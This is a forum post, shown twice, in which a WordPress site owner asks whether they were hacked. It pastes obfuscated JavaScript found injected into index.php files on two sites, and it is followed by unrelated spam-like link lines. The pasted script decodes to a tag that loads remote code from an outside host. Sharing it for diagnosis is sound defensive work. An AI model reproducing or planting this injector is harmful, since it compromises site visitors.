Have I been hacked?
Hey guys,
I have a couple of wordpress sites with RAP installed. A few days ago Site 1 completely stopped working. I'd type in my main URL and be greeted with a blank screen and one line of text...
"Parse error: syntax error, unexpected '?' in /home/mysite/public_html/mysite.com/index.php on line 18"
Luckily I could still log into my wordpress dashboard. I upgraded to the latest version of wordpress and my site came back. When I looked in the 'index.php' file for my site AND for all the index.php files for each of the rap products, I found this weird code...
<script type="text/javascript">var gRYBe1oT = "ihhu328ihhu335";var
ta0QoMGA0 = "ihhu33cihhu373ihhu363ihhu372ih"; var ta0QoMGA1 =
"hu369ihhu370ihhu374ihhu320ihhu"; var ta0QoMGA2 =
"374ihhu379ihhu370ihhu365ihhu33"; var ta0QoMGA3 =
"dihhu322ihhu374ihhu365ihhu378i"; var ta0QoMGA4 =
"hhu374ihhu32fihhu36aihhu361ihh"; var ta0QoMGA5 =
"u376ihhu361ihhu373ihhu363ihhu3"; var ta0QoMGA6 =
"72ihhu369ihhu370ihhu374ihhu322"; var ta0QoMGA7 =
"ihhu320ihhu373ihhu372ihhu363ih"; var ta0QoMGA8 =
"hu33dihhu322ihhu368ihhu374ihhu"; var ta0QoMGA9 =
"374ihhu370ihhu33aihhu32fihhu32"; var ta0QoMGA10 =
"fihhu363ihhu36fihhu375ihhu36ei"; var ta0QoMGA11 =
"hhu373ihhu36cihhu361ihhu376ihh"; var ta0QoMGA12 =
"u32eihhu373ihhu365ihhu372ihhu3"; var ta0QoMGA13 =
"76ihhu365ihhu36dihhu370ihhu333"; var ta0QoMGA14 =
"ihhu32eihhu363ihhu36fihhu36dih"; var ta0QoMGA15 =
"hu32fihhu32fihhu36dihhu36cihhu"; var ta0QoMGA16 =
"32eihhu370ihhu368ihhu370ihhu32"; var ta0QoMGA17 =
"2ihhu33eihhu320ihhu33cihhu32fi"; var ta0QoMGA18 =
"hhu373ihhu363ihhu372ihhu369ihh"; var ta0QoMGA19 = "u370ihhu374ihhu33e";
var Dr6aBsRr = "gBEj328ihhu335";var LMOjuKdO =
ta0QoMGA0+ta0QoMGA1+ta0QoMGA2+ta0QoMGA3+ta0QoMGA4+ ta0QoMGA5+ta0QoMGA6+ta
0QoMGA7+ta0QoMGA8+ta0QoMGA9+ta0QoMGA10+ta0QoMGA11+ ta0QoMGA12+ta0QoMGA13+
ta0QoMGA14+ta0QoMGA15+ta0QoMGA16+ta0QoMGA17+ta0QoM GA18+ta0QoMGA19;
mWh6WOln = LMOjuKdO.replace(/ihhu3/g,"%");var qxMicDSd = unescape;var
gRYBe1oT = "JZGKi28gBEj335";w9221 = this;var jb4cyJmr=w9221
["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];jb4cyJmr.write
(qxMicDSd(mWh6WOln));</script><div id='modalWindow' class='jqmWindow'>
<div id='jqmTitle'> <button class='jqmClose'>
Luckily I had a backup and this code was nowhere to be found in my backup files. So someone or something has put this code on my site. I went through and deleted this code from all of my index.php files, changed all my passwords and so far so good.
Unfortunately, tonight I checked my second site, also wordpress but on a completely different server (different hosting company too) and EXACTLY the same thing has happened there.
Any ideas?
I have a couple of wordpress sites with RAP installed. A few days ago Site 1 completely stopped working. I'd type in my main URL and be greeted with a blank screen and one line of text...
"Parse error: syntax error, unexpected '?' in /home/mysite/public_html/mysite.com/index.php on line 18"
Luckily I could still log into my wordpress dashboard. I upgraded to the latest version of wordpress and my site came back. When I looked in the 'index.php' file for my site AND for all the index.php files for each of the rap products, I found this weird code...
<script type="text/javascript">var gRYBe1oT = "ihhu328ihhu335";var
ta0QoMGA0 = "ihhu33cihhu373ihhu363ihhu372ih"; var ta0QoMGA1 =
"hu369ihhu370ihhu374ihhu320ihhu"; var ta0QoMGA2 =
"374ihhu379ihhu370ihhu365ihhu33"; var ta0QoMGA3 =
"dihhu322ihhu374ihhu365ihhu378i"; var ta0QoMGA4 =
"hhu374ihhu32fihhu36aihhu361ihh"; var ta0QoMGA5 =
"u376ihhu361ihhu373ihhu363ihhu3"; var ta0QoMGA6 =
"72ihhu369ihhu370ihhu374ihhu322"; var ta0QoMGA7 =
"ihhu320ihhu373ihhu372ihhu363ih"; var ta0QoMGA8 =
"hu33dihhu322ihhu368ihhu374ihhu"; var ta0QoMGA9 =
"374ihhu370ihhu33aihhu32fihhu32"; var ta0QoMGA10 =
"fihhu363ihhu36fihhu375ihhu36ei"; var ta0QoMGA11 =
"hhu373ihhu36cihhu361ihhu376ihh"; var ta0QoMGA12 =
"u32eihhu373ihhu365ihhu372ihhu3"; var ta0QoMGA13 =
"76ihhu365ihhu36dihhu370ihhu333"; var ta0QoMGA14 =
"ihhu32eihhu363ihhu36fihhu36dih"; var ta0QoMGA15 =
"hu32fihhu32fihhu36dihhu36cihhu"; var ta0QoMGA16 =
"32eihhu370ihhu368ihhu370ihhu32"; var ta0QoMGA17 =
"2ihhu33eihhu320ihhu33cihhu32fi"; var ta0QoMGA18 =
"hhu373ihhu363ihhu372ihhu369ihh"; var ta0QoMGA19 = "u370ihhu374ihhu33e";
var Dr6aBsRr = "gBEj328ihhu335";var LMOjuKdO =
ta0QoMGA0+ta0QoMGA1+ta0QoMGA2+ta0QoMGA3+ta0QoMGA4+ ta0QoMGA5+ta0QoMGA6+ta
0QoMGA7+ta0QoMGA8+ta0QoMGA9+ta0QoMGA10+ta0QoMGA11+ ta0QoMGA12+ta0QoMGA13+
ta0QoMGA14+ta0QoMGA15+ta0QoMGA16+ta0QoMGA17+ta0QoM GA18+ta0QoMGA19;
mWh6WOln = LMOjuKdO.replace(/ihhu3/g,"%");var qxMicDSd = unescape;var
gRYBe1oT = "JZGKi28gBEj335";w9221 = this;var jb4cyJmr=w9221
["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];jb4cyJmr.write
(qxMicDSd(mWh6WOln));</script><div id='modalWindow' class='jqmWindow'>
<div id='jqmTitle'> <button class='jqmClose'>
Luckily I had a backup and this code was nowhere to be found in my backup files. So someone or something has put this code on my site. I went through and deleted this code from all of my index.php files, changed all my passwords and so far so good.
Unfortunately, tonight I checked my second site, also wordpress but on a completely different server (different hosting company too) and EXACTLY the same thing has happened there.
Any ideas?
Scientific Dream Interpretation – A Solution to All Problems
How to Be Extremely Successful in Life
+++++++++++++++++++++++++++++++++++
Need Adult Writing done? Contact me! Custom from PG to XX